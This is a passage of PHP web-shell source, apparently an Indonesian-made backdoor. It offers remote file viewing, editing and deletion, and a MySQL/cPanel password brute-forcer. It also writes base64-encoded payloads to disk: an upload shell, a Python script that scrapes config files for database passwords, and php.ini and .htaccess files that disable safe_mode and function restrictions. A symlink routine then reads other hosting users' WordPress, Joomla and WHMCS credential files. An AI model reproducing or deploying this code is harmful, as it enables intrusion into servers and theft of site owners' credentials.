class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>";\r\n}\r\nelseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){\r\n  if(is_file($_GET[\'view\'])){ \r\n\tif(!isset($file)) $file = magicboom($_GET[\'view\']);\r\n\tif(!$win && $posix){\r\n\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t}\r\n\telse {\r\n\t\t$owner = $user;\r\n\t}\r\n\t$filn = basename($file);\r\n\techo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\">\r\n\t<tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span>\r\n\t<form action=\\"?y=".$pwd."&amp;view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" />\r\n\t</form>\r\n\t</td></tr>\r\n\t<tr><td>Size</td><td>".ukuran($file)."</td></tr>\r\n\t<tr><td>Permission</td><td>".get_perms($file)."</td></tr>\r\n\t<tr><td>Owner</td><td>".$owner."</td></tr>\r\n\t<tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>\r\n\t<tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>\r\n\t<tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>\r\n\t<tr><td>Actions</td><td><a href=\\"?y=$pwd&amp;edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$file\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$file\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$file\\">gzip</a>)</td></tr>\r\n\t<tr><td>View</td><td><a href=\\"?y=".$pwd."&amp;view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=code\\">code</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=image\\">image</a></td></tr>\r\n\t</table>\r\n\t";\r\n\tif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){\r\n\t\techo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&amp;img=".$filn."\\"></div>";\r\n\t}\r\n\telseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){\r\n\t\techo "<div class=\\"viewfile\\">";\r\n\t\t$file = wordwrap(@file_get_contents($file),"240","\\n");\r\n\t\t@highlight_string($file);\r\n\t\techo "</div>";\r\n\t}\r\n\telse {\r\n\t\techo "<div class=\\"viewfile\\">";\r\n\t\techo nl2br(htmlentities((@file_get_contents($file))));\r\n\t\techo "</div>";\r\n\t}\r\n  }\r\n  elseif(is_dir($_GET[\'view\'])){\r\n\t\techo showdir($pwd,$prompt);\r\n  }\r\n\t\r\n}\r\nelseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){\r\n\r\n\t\tif(isset($_POST[\'save\'])){\r\n\t\t\t$file = $_POST[\'saveas\'];\r\n\t\t\t$content = magicboom($_POST[\'content\']);\r\n\t\t\tif($filez = @fopen($file,"w")){\r\n\t\t\t\t$time = date("d-M-Y H:i",time());\r\n\t\t\t\tif(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time;\r\n\t\t\t\telse $msg = "failed to save";\r\n\t\t\t\t@fclose($filez);\r\n\t\t\t}\r\n\t\t\telse $msg = "permission denied";\r\n\t\t}\r\n\t\tif(!isset($file)) $file = $_GET[\'edit\'];\r\n\t\tif($filez = @fopen($file,"r")){\r\n\t\t\t$content = "";\r\n\t\t\twhile(!feof($filez)){\r\n\t\t\t\t$content .= htmlentities(str_replace("\'\'","\'",fgets($filez)));\r\n\t\t\t}\r\n\t\t\t@fclose($filez);\r\n\t\t}\r\n\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">\r\n<table class="cmdbox">\r\n<tr><td colspan="2">\r\n<textarea class="output" name="content">\r\n<?php echo $content; ?>\r\n</textarea>\r\n<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />\r\n&nbsp;<?php echo $msg; ?></td></tr>\r\n</table>\r\n</form>\r\n<?php\r\n}\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'logout\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">\r\n\r\n<?php\r\n    unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]); \r\n    echo \'bye!\'; \r\n}\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'brute\'))\r\n\t\t\t{\t\r\n\t\t\t?>\r\n\t\t\t\t<form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">\r\n\t\t\t<?php\r\n\t\t\t//bruteforce\r\n?>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\r\n<?php\r\n/*\r\nRecoded By X\'1n73ct\r\n*/\r\n@set_time_limit(0);\r\n@error_reporting(0);\r\n\r\n\r\nif($_POST[\'page\']==\'find\')\r\n{\r\nif(isset($_POST[\'usernames\']) && isset($_POST[\'passwords\']))\r\n{\r\n    if($_POST[\'type\'] == \'passwd\'){\r\n        $e = explode("\\n",$_POST[\'usernames\']);\r\n        foreach($e as $value){\r\n        $k = explode(":",$value);\r\n        $username .= $k[\'0\']." ";\r\n        }\r\n    }elseif($_POST[\'type\'] == \'simple\'){\r\n        $username = str_replace("\\n",\' \',$_POST[\'usernames\']);\r\n    }\r\n    $a1 = explode(" ",$username);\r\n    $a2 = explode("\\n",$_POST[\'passwords\']);\r\n    $id2 = count($a2);\r\n    $ok = 0;\r\n    foreach($a1 as $user )\r\n    {\r\n        if($user !== \'\')\r\n        {\r\n        $user=trim($user);\r\n         for($i=0;$i<=$id2;$i++)\r\n         {\r\n            $pass = trim($a2[$i]);\r\n            if(@mysql_connect(\'localhost\',$user,$pass))\r\n            {\r\n                echo "X\'1n73ct~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";\r\n                $ok++;\r\n            }\r\n         }\r\n        }\r\n    }\r\n    echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by x\'1n73ct</b>";\r\n    echo "<center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\n    exit;\r\n}\r\n}\r\nif($_POST[\'pass\']==\'password\'){\r\n@error_reporting(0);\r\n$i = getenv(\'REMOTE_ADDR\');\r\n$d = date(\'D, M jS, Y H:i\',time());\r\n$h = $_SERVER[\'HTTP_HOST\'];\r\n$dir=$_SERVER[\'PHP_SELF\'];\r\n$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";\r\n$file = fopen(".php","w+");\r\n$write = fwrite ($file ,base64_decode($back));\r\nfclose($file);\r\nchmod(".php",0755);\r\nmkdir(\'config\',0755);\r\n$cp =\r\n\'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=\';\r\n$file = fopen("cp.py","w+");\r\n$write = fwrite ($file ,base64_decode($cp));\r\nfclose($file);\r\nchmod("cp.py",0755);\r\n$url = $_POST[\'url\'];\r\necho"<center>\r\n<textarea cols=\\"90\\" rows=\\"20\\" name=\\"usernames\\">";\r\nsystem("python cp.py $url config");\r\nunlink (\'cp.py\');\r\necho"</textarea>\r\n</center>";\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\nif($_POST[\'matikan\']==\'sekatan\'){\r\n@error_reporting(0);\r\n$phpini =\r\n\'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==\';\r\n$file = fopen("php.ini","w+");\r\n$write = fwrite ($file ,base64_decode($phpini));\r\nfclose($file);\r\n$htaccess =\r\n\'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==\';\r\n$file = fopen(".htaccess","w+");\r\n$write = fwrite ($file ,base64_decode($htaccess));\r\necho "<hr><center><b>DONE!";\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\nif($_POST[\'mendapatkan\']==\'passwd\'){\r\n@set_magic_quotes_runtime(0);\r\nob_start();\r\nerror_reporting(0);\r\n@set_time_limit(0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0);\r\n$fn = $_POST[\'foldername\'];\r\n//all function here\r\n\r\nfunction syml($usern,$pdomain)\r\n\t{\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/blog/configur